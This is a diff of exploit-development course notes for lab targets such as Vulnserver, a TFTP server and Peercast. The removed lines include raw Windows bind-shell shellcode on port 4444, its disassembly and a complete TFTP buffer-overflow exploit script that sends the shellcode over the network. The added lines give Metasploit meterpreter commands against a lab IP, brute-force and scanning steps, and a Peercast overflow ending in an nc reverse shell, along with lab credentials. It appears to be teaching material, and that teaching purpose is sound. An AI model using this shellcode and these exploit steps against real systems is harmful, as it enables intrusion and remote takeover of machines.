616	+	- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
617
618		6-jmp-esp.py
619	-	We want to generate the shellcode (BIND SHELL on Port 4444)
619	+	- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
620	-	- No restricted characters
620	+
621	-	- Encoder: NONE
621	+	7-first-exploit
622		- In this script we actually do the stack overflow and launch a bind shell on port 4444
623	-	Create a Python file called dumpshellcode.py
623	+
624		8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
625	-	---
625	+
626	-	#!/usr/bin/python2
626	+
627		------------------------------
628	-	import os
628	+
629	-	import sys
629	+	cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
630	-	import struct
630	+
631		vi vulnserv.rb (paste the code into this file)
632
633	-	# win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
633	+
634	-	shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
634	+
635	-	shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
635	+	cd ~/toolz/metasploit
636	-	shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
636	+
637	-	shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
637	+	./msfconsole
638	-	shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
638	+
639	-	shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
639	+
640	-	shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
640	+
641	-	shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
641	+	use exploit/windows/misc/vulnserv
642	-	shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
642	+	set PAYLOAD windows/meterpreter/bind_tcp
643	-	shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
643	+	set RHOST 192.168.88.129
644	-	shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
644	+	set RPORT 9999
645	-	shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
645	+	exploit
646	-	shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
646	+
647	-	shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
647	+	---------------------------------------------------------------------
648	-	shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
648	+	Day 1 Challenge:
649	-	shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
649	+
650	-	shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
650	+	Write an exploit for FreeFloat FTP - make sure that it is broken up into multiple scripts like the vulnserver exploit is.
651	-	shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
651	+	https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
652	-	shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
652	+
653	-	shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
653	+
654		Reference scripts for FreeFloat FTP:
655	-	sys.stdout.write(shellcode)
655	+	https://www.exploit-db.com/exploits/40711/
656	-	---
656	+	https://www.exploit-db.com/exploits/40681/
657		https://www.exploit-db.com/exploits/40677/
658		https://www.exploit-db.com/exploits/40674/
659		https://www.exploit-db.com/exploits/40673/
660	-	python dumpshell.py > bindshell.bin
660	+	https://www.exploit-db.com/exploits/40672/
661		https://www.exploit-db.com/exploits/24479/
662	-	copy bindshellcode.bin into the "c:\Program Files\nasm" directory
662	+
663
664
665
666	-	Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
666	+
667	-	317 bindshell.bin
667	+
668
669	-	C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
669	+
670	-	00000000 FC cld
670	+
671	-	00000001 6AEB push byte -0x15
671	+
672	-	00000003 4D dec ebp
672	+
673	-	00000004 E8F9FFFFFF call dword 0x2
673	+	---------------------------------------------------------------------------------------------------------------------------------
674	-	00000009 60 pushad
674	+	Summary of what we've learned so far....
675	-	0000000A 8B6C2424 mov ebp,[esp+0x24]
675	+
676	-	0000000E 8B453C mov eax,[ebp+0x3c]
676	+
677	-	00000011 8B7C0578 mov edi,[ebp+eax+0x78]
677	+	Skill Level 1: (Can identify vulnerable hosts - KNOWN VULNERABILITIES)
678	-	00000015 01EF add edi,ebp
678	+	----------------------------------------------------------------------
679	-	00000017 8B4F18 mov ecx,[edi+0x18]
679	+	- Ping Sweep
680	-	0000001A 8B5F20 mov ebx,[edi+0x20]
680	+	- Port Scan
681	-	0000001D 01EB add ebx,ebp
681	+	- Bannergrab
682	-	0000001F 49 dec ecx
682	+	- Vulnerability Research
683	-	00000020 8B348B mov esi,[ebx+ecx*4]
683	+
684	-	00000023 01EE add esi,ebp
684	+	##############################
685	-	00000025 31C0 xor eax,eax
685	+	# Scanning Process to follow #
686	-	00000027 99 cdq
686	+	##############################
687	-	00000028 AC lodsb
687	+	Step 1: Ping Sweep
688	-	00000029 84C0 test al,al
688	+
689	-	0000002B 7407 jz 0x34
689	+	nmap -sP <IP-ADDRESS-RANGE>
690	-	0000002D C1CA0D ror edx,0xd
690	+	nmap -sL <IP-ADDRESS-RANGE>
691	-	00000030 01C2 add edx,eax
691	+
692	-	00000032 EBF4 jmp short 0x28
692	+
693	-	00000034 3B542428 cmp edx,[esp+0x28]
693	+	Step 2: Port Scan
694	-	00000038 75E5 jnz 0x1f
694	+	-----------------
695	-	0000003A 8B5F24 mov ebx,[edi+0x24]
695	+	nmap -sS <IP-ADDRESS>
696	-	0000003D 01EB add ebx,ebp
696	+
697	-	0000003F 668B0C4B mov cx,[ebx+ecx*2]
697	+
698	-	00000043 8B5F1C mov ebx,[edi+0x1c]
698	+	Step 3: Bannergrab
699	-	00000046 01EB add ebx,ebp
699	+
700	-	00000048 032C8B add ebp,[ebx+ecx*4]
700	+	nmap -sV <IP-ADDRESS>
701	-	0000004B 896C241C mov [esp+0x1c],ebp
701	+	nmap -sV -p- <IP-ADDRESS>
702	-	0000004F 61 popad
702	+	\|
703	-	00000050 C3 ret
703	+	----> Vulnerability Research
704	-	00000051 31DB xor ebx,ebx
704	+
705	-	00000053 648B4330 mov eax,[fs:ebx+0x30]
705	+
706	-	00000057 8B400C mov eax,[eax+0xc]
706	+	Step 4: Vulnerability Scan the webservers
707	-	0000005A 8B701C mov esi,[eax+0x1c]
707	+	-----------------------------------------
708	-	0000005D AD lodsd
708	+	git clone https://github.com/sullo/nikto.git Nikto2
709	-	0000005E 8B4008 mov eax,[eax+0x8]
709	+
710	-	00000061 5E pop esi
710	+	cd Nikto2/program
711	-	00000062 688E4E0EEC push dword 0xec0e4e8e
711	+
712	-	00000067 50 push eax
712	+	perl nikto.pl -h <IP-ADDRESS>
713	-	00000068 FFD6 call esi
713	+
714	-	0000006A 6653 push bx
714	+
715	-	0000006C 66683332 push word 0x3233
715	+
716	-	00000070 687773325F push dword 0x5f327377
716	+	Step 5: Directory Bruteforce
717	-	00000075 54 push esp
717	+	--------------------
718	-	00000076 FFD0 call eax
718	+	sudo apt install -y libcurl4-openssl-dev
719	-	00000078 68CBEDFC3B push dword 0x3bfcedcb
719	+
720	-	0000007D 50 push eax
720	+	git clone https://github.com/v0re/dirb.git
721	-	0000007E FFD6 call esi PART 1
721	+
722	-	00000080 5F pop edi
722	+	cd dirb/
723	-	00000081 89E5 mov ebp,esp
723	+
724	-	00000083 6681ED0802 sub bp,0x208
724	+	./configure
725	-	00000088 55 push ebp
725	+
726	-	00000089 6A02 push byte +0x2
726	+	make
727	-	0000008B FFD0 call eax
727	+
728	-	0000008D 68D909F5AD push dword 0xadf509d9
728	+	./dirb
729	-	00000092 57 push edi
729	+
730	-	00000093 FFD6 call esi
730	+	./dirb http://<IP-ADDRESS> wordlists/big.txt
731	-	00000095 53 push ebx
731	+
732	-	00000096 53 push ebx
732	+
733	-	--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
733	+
734	-	00000097 53 push ebx
734	+
735	-	00000098 53 push ebx
735	+
736	-	00000099 53 push ebx
736	+	Step 6: Bruteforce any services you find
737	-	0000009A 43 inc ebx
737	+	----------------------------------------
738	-	0000009B 53 push ebx
738	+	root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
739	-	0000009C 43 inc ebx
739	+	root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS
740	-	0000009D 53 push ebx PART 2
740	+
741	-	0000009E FFD0 call eax
741	+
742	-	000000A0 6668115C push word 0x5c11
742	+
743	-	000000A4 6653 push bx
743	+	Skill Level 2: Can identify UNKNOWN VULNERABILITIES)
744	-	000000A6 89E1 mov ecx,esp
744	+	----------------------------------------------------
745	-	000000A8 95 xchg eax,ebp
745	+	1. App Type
746	-	000000A9 68A41A70C7 push dword 0xc7701aa4
746	+	- Stand Alone
747	-	000000AE 57 push edi
747	+	- Client-Server (app name: vulnserver.exe)
748	-	000000AF FFD6 call esi
748	+	- Web App
749	-	000000B1 6A10 push byte +0x10
749	+
750	-	000000B3 51 push ecx
750	+	2. Data Input Type
751	-	000000B4 55 push ebp
751	+	- File/Keyboard/Mouse (Stand Alone)
752	-	000000B5 FFD0 call eax
752	+	- Logical Network Port (Client-Server) (tcp port: 9999)
753	-	000000B7 68A4AD2EE9 push dword 0xe92eada4
753	+	- Browser (Web App)
754	-	000000BC 57 push edi
754	+
755	-	000000BD FFD6 call esi
755	+
756	-	000000BF 53 push ebx
756	+	3a. Map and fuzz all app entry points
757	-	000000C0 55 push ebp
757	+	- Methods
758	-	000000C1 FFD0 call eax
758	+	- Functions
759	-	000000C3 68E5498649 push dword 0x498649e5
759	+	- Subroutines
760	-	000000C8 57 push edi
760	+	- Controllers
761	-	000000C9 FFD6 call esi
761	+	- Commands
762	-	000000CB 50 push eax
762	+	HELP
763	-	000000CC 54 push esp
763	+	STATS [stat_value]
764	-	000000CD 54 push esp
764	+	RTIME [rtime_value]
765	-	000000CE 55 push ebp
765	+	LTIME [ltime_value]
766	-	000000CF FFD0 call eax
766	+	SRUN [srun_value]
767	-	000000D1 93 xchg eax,ebx
767	+	TRUN [trun_value]
768	-	000000D2 68E779C679 push dword 0x79c679e7
768	+	GMON [gmon_value]
769	-	000000D7 57 push edi
769	+	GDOG [gdog_value]
770	-	000000D8 FFD6 call esi
770	+	KSTET [kstet_value]
771	-	000000DA 55 push ebp
771	+	GTER [gter_value]
772	-	000000DB FFD0 call eax
772	+	HTER [hter_value]
773	-	000000DD 666A64 push word 0x64
773	+	LTER [lter_value]
774	-	000000E0 6668636D push word 0x6d63
774	+	KSTAN [lstan_value]
775	-	000000E4 89E5 mov ebp,esp
775	+	EXIT
776	-	000000E6 6A50 push byte +0x50
776	+
777	-	000000E8 59 pop ecx
777	+	3b. Fuzz each app entry point
778	-	000000E9 29CC sub esp,ecx
778	+
779	-	000000EB 89E7 mov edi,esp
779	+
780	-	000000ED 6A44 push byte +0x44
780	+	4. Isolate the crash
781	-	000000EF 89E2 mov edx,esp
781	+	- TRUN 2100 is where the app crashes once placed in OllyDBG
782	-	000000F1 31C0 xor eax,eax
782	+
783	-	000000F3 F3AA rep stosb
783	+
784	-	000000F5 FE422D inc byte [edx+0x2d]
784	+	5. Calculate distance to EIP
785	-	000000F8 FE422C inc byte [edx+0x2c]
785	+	- Distance to EIP is 2006 bytes
786	-	000000FB 93 xchg eax,ebx
786	+
787	-	000000FC 8D7A38 lea edi,[edx+0x38]
787	+
788	-	000000FF AB stosd
788	+	6. Redirect program execution
789	-	00000100 AB stosd
789	+	- JMP REG (example: JMP ESP)
790	-	00000101 AB stosd
790	+	- PUSH REG; RET (PUSH EST; RET)
791	-	00000102 6872FEB316 push dword 0x16b3fe72
791	+	- CALL REG; (CALL ESP)
792	-	00000107 FF7544 push dword [ebp+0x44]
792	+	----------------------------------------------------------------
793	-	0000010A FFD6 call esi
793	+	625011AF FFE4 JMP ESP
794	-	0000010C 5B pop ebx
794	+	Remember that you need to write 625011AF backwards and in hex
795	-	0000010D 57 push edi
795	+	jmpesp='\xaf\x11\x50\x62'
796	-	0000010E 52 push edx
796	+
797	-	0000010F 51 push ecx
797	+	Or you can use struct.pack to write it as little endian
798	-	00000110 51 push ecx
798	+	import struct
799	-	00000111 51 push ecx
799	+	struct.pack("<L", 0x625011AF)
800	-	00000112 6A01 push byte +0x1
800	+	----------------------------------------------------------------
801	-	00000114 51 push ecx
801	+	- Land in dummy shellcode
802	-	00000115 51 push ecx
802	+
803	-	00000116 55 push ebp
803	+
804	-	00000117 51 push ecx
804	+	7. Replace dummy shellcode with real shellcode
805	-	00000118 FFD0 call eax
805	+	- Bad characters
806	-	0000011A 68ADD905CE push dword 0xce05d9ad
806	+	Reference link: http://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
807	-	0000011F 53 push ebx
807	+	"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
808	-	00000120 FFD6 call esi
808	+	"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
809	-	00000122 6AFF push byte -0x1
809	+	"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
810	-	00000124 FF37 push dword [edi]
810	+	"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
811	-	00000126 FFD0 call eax
811	+	"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
812	-	00000128 8B57FC mov edx,[edi-0x4]
812	+	"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
813	-	0000012B 83C464 add esp,byte +0x64
813	+	"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
814	-	0000012E FFD6 call esi
814	+	"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
815	-	00000130 52 push edx
815	+	- Not enough space
816	-	00000131 FFD0 call eax
816	+	subtract the bottom of ESP from the top of ESP to figure out how much space you have for the payload
817	-	00000133 68F08A045F push dword 0x5f048af0
817	+
818	-	00000138 53 push ebx
818	+
819	-	00000139 FFD6 call esi
819	+	##################
820	-	0000013B FFD0 call eax
820	+	# Linux Exploits #
821		##################
822
823		The target virtual machine for these labs can be downloaded from here:
824		https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
825	-	part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
825	+	root: exploitlab
826	-	part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
826	+	user: exploitlab
827	-	part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
827	+	pass: exploitlab
828	-	part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
828	+
829	-	part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
829	+
830	-	part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
830	+
831	-	part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
831	+	The attack scripts can be downloaded from here:
832	-	part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
832	+	https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
833	-	part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
833	+	https://s3.amazonaws.com/secureninja/files/dproxy.zip
834	-	part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
834	+	https://s3.amazonaws.com/secureninja/files/asterisk.zip
835
836
837	-	part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
837	+	######################################
838	-	part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
838	+	# Lab 1: Simple Linux Stack Overflow #
839	-	part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
839	+	######################################
840	-	part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
840	+	Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
841	-	part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
841	+
842	-	part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
842	+	---------------------------Type This-----------------------------------
843	-	part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
843	+
844	-	part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
844	+	cat victim1.c
845	-	part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
845	+	gcc victim1.c -o victim1
846	-	part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
846	+	./victim AAAAAAAAAAAAAAAAAAA
847	-	part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
847	+	./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
848
849
850	-	STACK SHIFTER:
850	+
851	-	prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
851	+	gdb -core core.xxxx
852	-	prepend += "\x44" # inc esp
852	+	info registers
853		x/64x $esp
854		quit
855
856
857		/usr/local/sbin/peercast
858
859		-open peercast1.py on the XP attack-
860		python peercast1.py \| nc asterisk-vm-ip 7144
861
862		gdb -core core.xxxx
863		info registers
864		x/64x $esp
865		quit
866
867	-	---- final script ----
867	+
868
869	-	#!/usr/bin/python2
869	+	/usr/local/sbin/peercast
870	-	#TFTP Server remote Buffer Overflow
870	+
871		-open peercast2.py-
872	-	import sys
872	+	python peercast2.py \| nc asterisk-vm-ip 7144
873	-	import socket
873	+
874	-	import struct
874	+	gdb -core core.xxxx
875		info registers
876	-	if len(sys.argv) < 2:
876	+	x/64x $esp
877	-	sys.stderr.write("Usage: tftpd.py <host>\n")
877	+	quit
878	-	sys.exit(1)
878	+
879
880	-	target = sys.argv[1]
880	+
881	-	port = 69
881	+
882
883	-	eip = 0x7e429353 # jmp esp in USER32.DLL
883	+	- SSH into the Ubuntu Host (strategicsec:strategicsec) -
884		cd /home/strategicsec/toolz/metasploit/tools/exploit
885	-	part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
885	+
886	-	part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
886	+	Now we will run the pattern offset with ruby:
887	-	part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
887	+
888	-	part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
888	+	ruby pattern_offset.rb 42306142
889	-	part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
889	+
890	-	part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
890	+	and
891	-	part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
891	+
892	-	part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
892	+	ruby pattern_offset.rb 61423161
893	-	part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
893	+	-----------------------------------------------------------------------
894	-	part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
894	+
895		Distance to EIP is 780
896	-	part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
896	+	Relative position of ESP 784
897	-	part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
897	+
898	-	part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
898	+	Now to find a good JMP ESP address with msfelfscan
899	-	part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
899	+
900	-	part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
900	+	---------------------------Type This-----------------------------------
901	-	part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
901	+
902	-	part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
902	+
903	-	part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
903	+	./msfelfscan -j ESP binaries/peercast_binary
904	-	part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
904	+	-----------------------------------------------------------------------
905	-	part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
905	+
906	-	part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
906	+	0x0808fb57 jmp esp <----- we will use this one!
907		0x0808fcc7 jmp esp
908	-	prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
908	+	0x0808ffff jmp esp
909	-	prepend += "\x44" # inc esp
909	+	0x08090057 jmp esp <----- we can't use this one.
910		0x080901df jmp esp
911	-	buf = "\x00\x01" # receive command
911	+
912
913	-	buf += "\x90" * (256 - len(part2)) # NOPs
913	+	Now open and edit peercast3.py in notepad++ on our XP Host machine.
914	-	buf += part2 # shellcode part 2
914	+	pad_lenth = the distance to EIP
915	-	buf += struct.pack('<I', eip) # EIP (JMP ESP)
915	+	ret_address = the jmp esp we are using
916	-	buf += prepend # stack shifter
916	+
917	-	buf += part1 # shellcode part 1
917	+	---------------------------Type This-----------------------------------
918	-	buf += "\xE9" + struct.pack('<i', -380) # JMP -380
918	+
919	-	buf += "\x00" # END
919	+	python peercast3.py \| nc asterisk-vm-ip 7144
920
921	-	# print buf
921	+	gdb -core core.xxxx
922		info registers
923	-	# buf = "\x00\x01" # receive command
923	+	x/64x $eip
924		x/10i $eip
925	-	# buf += "A" * 300 + "\x00"
925	+	quit
926		-----------------------------------------------------------------------
927	-	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
927	+
928		Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
929	-	try:
929	+
930	-	sock.connect((target, port))
930	+	Linux IA32 Reverse Shell
931	-	sock.sendall(buf)
931	+	LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
932	-	except Exception as e:
932	+	LPORT (Listening Port) – chose a port to run your listener on
933	-	sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
933	+	Encoder: Alpha2
934	-	finally:
934	+
935	-	sock.close()
935	+	---------------------------Type This-----------------------------------
936	-	sys.stderr.write("Sent.\n")
936	+
937		nc -l -p 4321
938		python peercast4.py \| nc asterisk-vm-ip 7144
939		-----------------------------------------------------------------------
940	-	-----------------------------------------------------------------------------------------------------------------
940	+
941
942		###########################
943		----------- ############### # Day 3: Attack Lab Hosts # ############### -----------
944		###########################
945	-	How does all of this actually work
945	+
946
947
948		#########################
949		# Class Virtual Machine #
950	-	Total shellcode length: 315
950	+	#########################
951
952	-	Part1: 150
952	+
953	-	Part2: 165
953	+	Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
954
955		https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
956	-	NOPS * (256 - 165)
956	+	user: infosecaddicts
957		pass: infosecaddicts
958	-	91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
958	+
959	-	\| \| \|
959	+
960	-	256 260 150 (410) \|
960	+	Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
961	-	\|<------------------------------------------------------------------------------------------------------------\|
961	+
962	-	Jump to the
962	+
963	-	30 byte mark
963	+	To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
964		https://54.245.178.32/?src=connect
965
966
967		Accept the security exception and enter one of the following user names:
968	-	# Lab 3: Browsers Exploits #
968	+
969		username: labuser001
970		username: labuser002
971	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
971	+	username: labuser003
972	-	Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
972	+	username: labuser004
973	-	rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
973	+	username: labuser005
974		username: labuser006
975	-	<object id=quicktime clsid="999-999999-99-99999">
975	+	username: labuser007
976	-	<param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
976	+	username: labuser008
977	-	</object>
977	+	username: labuser009
978		username: labuser010
979	-	var buf = "";
979	+	username: labuser011
980	-	for(i = 0; i < 50000; i++)
980	+	username: labuser012
981	-	buf += "A";
981	+	username: labuser013
982	-	var myobject = document.getElementById("quicktime");
982	+	username: labuser014
983	-	myobject.url = buf;
983	+	username: labuser015
984		username: labuser016
985	-	YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
985	+	username: labuser017
986		username: labuser018
987	-	- Browsers (Flash)
987	+	username: labuser019
988	-	- PDF
988	+	username: labuser020
989	-	- MS Office / OOo
989	+
990		----------------------------------------------------------------------------------------------------------------------------------------
991	-	VLC smb:// exploit
991	+
992		Mr. McCray will provide you with the password for the usernames above once the training session starts.
993
994	-	EXPLOIT VECTOR
994	+
995
